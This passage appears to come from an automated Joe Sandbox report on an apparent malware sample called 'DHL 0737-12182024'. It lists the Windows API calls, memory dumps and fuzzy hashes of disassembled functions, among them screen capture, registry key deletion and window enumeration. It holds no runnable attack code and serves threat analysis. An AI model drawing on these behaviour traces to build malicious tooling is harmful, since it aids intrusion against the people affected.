                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 008B8592
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85A2
                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85AD
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85BA
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 008B85C8
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85D7
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 008B85E0
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85E7
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008B85F8
                                                                                            • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,008BFC38,?), ref: 008B8611
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008B8621
                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 008B8641
                                                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 008B8671
                                                                                            • DeleteObject.GDI32(?), ref: 008B8699
                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008B86AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3840717409-0
                                                                                            • Opcode ID: 20bc583f0b41de7e9b86db23167736cd5bbe1b8d3bb852dc5fe590e2257203e0
                                                                                            • Instruction ID: 1d5daf5a1d4363b395712d3595b26e8648db67902bee1c67c4a48b2d2de7ce63
                                                                                            • Opcode Fuzzy Hash: 20bc583f0b41de7e9b86db23167736cd5bbe1b8d3bb852dc5fe590e2257203e0
                                                                                            • Instruction Fuzzy Hash: 6D410975600209EFDB119FA5CC48EAA7BBCFF99715F104159F919E7260DB309901CB60
                                                                                            Function 008914BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(00000000), ref: 00891502
                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0089150B
                                                                                            • VariantClear.OLEAUT32(?), ref: 00891517
                                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 008915FB
                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 00891657
                                                                                            • VariantInit.OLEAUT32(?), ref: 00891708
                                                                                            • SysFreeString.OLEAUT32(?), ref: 0089178C
                                                                                            • VariantClear.OLEAUT32(?), ref: 008917D8
                                                                                            • VariantClear.OLEAUT32(?), ref: 008917E7
                                                                                            • VariantInit.OLEAUT32(00000000), ref: 00891823
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                            • API String ID: 1234038744-3931177956
                                                                                            • Opcode ID: cb06ba2234237efc66bb3ab4c5bc5f816881fbb7f3c1b95997639f430d0a81a2
                                                                                            • Instruction ID: 9e919926a52ccd943bcdb2de52db65956d8fa1142b013d0ace2d4548d3b57a9c
                                                                                            • Opcode Fuzzy Hash: cb06ba2234237efc66bb3ab4c5bc5f816881fbb7f3c1b95997639f430d0a81a2
                                                                                            • Instruction Fuzzy Hash: AFD1E131A0811AEBDF00AF69D889B79B7B5FF44704F1A8056F446EB291DB30DD41DBA2
                                                                                            Function 008AB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 008AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008AB6AE,?,?), ref: 008AC9B5
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008AC9F1
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA68
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA9E
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008AB6F4
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008AB772
                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 008AB80A
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008AB87E
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008AB89C
                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 008AB8F2
                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008AB904
                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 008AB922
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008AB983
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008AB994
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                            • API String ID: 146587525-4033151799
                                                                                            • Opcode ID: 4a1d3ffe827af83942b1744e688e41e5ace7d63c449fefc858189759cb818979
                                                                                            • Instruction ID: 74658c3b57d3efcd053595631b454b49224004d3b49e35da172b559c92fcf38f
                                                                                            • Opcode Fuzzy Hash: 4a1d3ffe827af83942b1744e688e41e5ace7d63c449fefc858189759cb818979
                                                                                            • Instruction Fuzzy Hash: 00C17D30204241AFE714DF18C494F2ABBE5FF85318F18855CF49A8B6A2DB75ED85CB92
                                                                                            Function 008A255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 008A25D8
                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008A25E8
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 008A25F4
                                                                                            • SelectObject.GDI32(00000000,?), ref: 008A2601
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 008A266D
                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008A26AC
                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008A26D0
                                                                                            • SelectObject.GDI32(?,?), ref: 008A26D8
                                                                                            • DeleteObject.GDI32(?), ref: 008A26E1
                                                                                            • DeleteDC.GDI32(?), ref: 008A26E8
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 008A26F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                            • String ID: (
                                                                                            • API String ID: 2598888154-3887548279
                                                                                            • Opcode ID: 4c56c1525d4410b0d9655b766c6339df41343e7264ef574097d7e8a568ed1747
                                                                                            • Instruction ID: e317f491ffa65600fdaad8a63cae396bfc45f060e8f51135c85d91fca7e7c054
                                                                                            • Opcode Fuzzy Hash: 4c56c1525d4410b0d9655b766c6339df41343e7264ef574097d7e8a568ed1747
                                                                                            • Instruction Fuzzy Hash: AE61D175D00219EFDF14CFA8D984AAEBBB5FF48310F208529E955E7250E770A951CFA0
                                                                                            Function 0085DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 0085DAA1
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D659
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D66B
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D67D
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D68F
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6A1
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6B3
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6C5
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6D7
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6E9
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D6FB
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D70D
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D71F
                                                                                              • Part of subcall function 0085D63C: _free.LIBCMT ref: 0085D731
                                                                                            • _free.LIBCMT ref: 0085DA96
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 0085DAB8
                                                                                            • _free.LIBCMT ref: 0085DACD
                                                                                            • _free.LIBCMT ref: 0085DAD8
                                                                                            • _free.LIBCMT ref: 0085DAFA
                                                                                            • _free.LIBCMT ref: 0085DB0D
                                                                                            • _free.LIBCMT ref: 0085DB1B
                                                                                            • _free.LIBCMT ref: 0085DB26
                                                                                            • _free.LIBCMT ref: 0085DB5E
                                                                                            • _free.LIBCMT ref: 0085DB65
                                                                                            • _free.LIBCMT ref: 0085DB82
                                                                                            • _free.LIBCMT ref: 0085DB9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: fe5c2065ee3ebae3ac6d47f5cd47bdae3af7281c3fc528eb5de6cfccf7fd262a
                                                                                            • Instruction ID: 3ea79b260e6c07ce6985714f27925c397bdbd5ec0b29806bba12cfac4f2621c0
                                                                                            • Opcode Fuzzy Hash: fe5c2065ee3ebae3ac6d47f5cd47bdae3af7281c3fc528eb5de6cfccf7fd262a
                                                                                            • Instruction Fuzzy Hash: 44314D316047059FEB32AA39E845F967BE9FF01322F554419EC49E7291DF31AC48C722
                                                                                            Function 0088365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0088369C
                                                                                            • _wcslen.LIBCMT ref: 008836A7
                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00883797
                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0088380C
                                                                                            • GetDlgCtrlID.USER32(?), ref: 0088385D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00883882
                                                                                            • GetParent.USER32(?), ref: 008838A0
                                                                                            • ScreenToClient.USER32(00000000), ref: 008838A7
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00883921
                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0088395D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                            • String ID: %s%u
                                                                                            • API String ID: 4010501982-679674701
                                                                                            • Opcode ID: 2c6b042df18f8c07d307d9924c054a7126b595b3be7280f03945331fd9b9aa41
                                                                                            • Instruction ID: ee78a1b62c4cb6a1e0348f31af1a71819e8d16c8bed38a1a023fad3813093c28
                                                                                            • Opcode Fuzzy Hash: 2c6b042df18f8c07d307d9924c054a7126b595b3be7280f03945331fd9b9aa41
                                                                                            • Instruction Fuzzy Hash: 1491D571204706AFD719EF24C885FAAFBE8FF45750F008629F999C2191EB30EA45CB91
                                                                                            Function 00884954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00884994
                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 008849DA
                                                                                            • _wcslen.LIBCMT ref: 008849EB
                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 008849F7
                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00884A2C
                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00884A64
                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00884A9D
                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00884AE6
                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00884B20
                                                                                            • GetWindowRect.USER32(?,?), ref: 00884B8B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                            • String ID: ThumbnailClass
                                                                                            • API String ID: 1311036022-1241985126
                                                                                            • Opcode ID: b65e37d36327e7e16f456498640e9f3ec233c07f061185b2dcc430e1d496747f
                                                                                            • Instruction ID: e46815ce231884afa7c6bc5a18cba61ade972d7dcaf87614c303f0ad92aaada7
                                                                                            • Opcode Fuzzy Hash: b65e37d36327e7e16f456498640e9f3ec233c07f061185b2dcc430e1d496747f
                                                                                            • Instruction Fuzzy Hash: 1791E27200420A9FDB04EF54C981FAA77E9FF44314F04946AFD85DA096EB34ED45CBA2
                                                                                            Function 008B8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008B8D5A
                                                                                            • GetFocus.USER32 ref: 008B8D6A
                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 008B8D75
                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 008B8E1D
                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 008B8ECF
                                                                                            • GetMenuItemCount.USER32(?), ref: 008B8EEC
                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 008B8EFC
                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 008B8F2E
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 008B8F70
                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008B8FA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                            • String ID: 0
                                                                                            • API String ID: 1026556194-4108050209
                                                                                            • Opcode ID: a4b16adca5ef7764867481ac9b97329d0f4af6a89a7383e3c1e93c36592df46c
                                                                                            • Instruction ID: d087161805b1e3f8a41304aa4c4a957e28cbf44bbb335c6799d6d3e35862b75b
                                                                                            • Opcode Fuzzy Hash: a4b16adca5ef7764867481ac9b97329d0f4af6a89a7383e3c1e93c36592df46c
                                                                                            • Instruction Fuzzy Hash: 47816A71508305EFDB20CF24D885AABBBE9FB88754F140A1AF995D7391DB70D900CBA2
                                                                                            Function 0088DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0088DC20
                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0088DC46
                                                                                            • _wcslen.LIBCMT ref: 0088DC50
                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0088DCA0
                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0088DCBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                            • API String ID: 1939486746-1459072770
                                                                                            • Opcode ID: 9255e061ee0ba6239648abc7fc1c48bf3def0495bccf8f2353341948b2a8c913
                                                                                            • Instruction ID: ab599db7aae582dc4b9ba73ea3edb20154b6d063e91af39bcb63b7deb34f5e76
                                                                                            • Opcode Fuzzy Hash: 9255e061ee0ba6239648abc7fc1c48bf3def0495bccf8f2353341948b2a8c913
                                                                                            • Instruction Fuzzy Hash: A141E0329403197BDB20B66ADC47EBF776CFF52760F10006AF904E6283EA64990197A6
                                                                                            Function 008ACC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008ACC64
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 008ACC8D
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008ACD48
                                                                                              • Part of subcall function 008ACC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 008ACCAA
                                                                                              • Part of subcall function 008ACC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 008ACCBD
                                                                                              • Part of subcall function 008ACC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008ACCCF
                                                                                              • Part of subcall function 008ACC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008ACD05
                                                                                              • Part of subcall function 008ACC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008ACD28
                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 008ACCF3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                            • API String ID: 2734957052-4033151799
                                                                                            • Opcode ID: bf8d49b810837472354f64ab388034f5493d0344c58de04d7e192c1e6d1c4a11
                                                                                            • Instruction ID: 8ecb441910474e85251d9512b487c105aa74510a8d1ff2803ee300b32d83d99e
                                                                                            • Opcode Fuzzy Hash: bf8d49b810837472354f64ab388034f5493d0344c58de04d7e192c1e6d1c4a11
                                                                                            • Instruction Fuzzy Hash: F5318D71901128BBEB209B95DC88EFFBB7CFF16750F000165F916E2240DB749A46DAB0
                                                                                            Function 00893D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00893D40
                                                                                            • _wcslen.LIBCMT ref: 00893D6D
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00893D9D
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00893DBE
                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00893DCE
                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00893E55
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00893E60
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00893E6B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                            • String ID: :$\$\??\%s
                                                                                            • API String ID: 1149970189-3457252023
                                                                                            • Opcode ID: 9e08bc0357ff0d3d8f2424ea4ad20bab93a4ca007d010035f29b771f1655669a
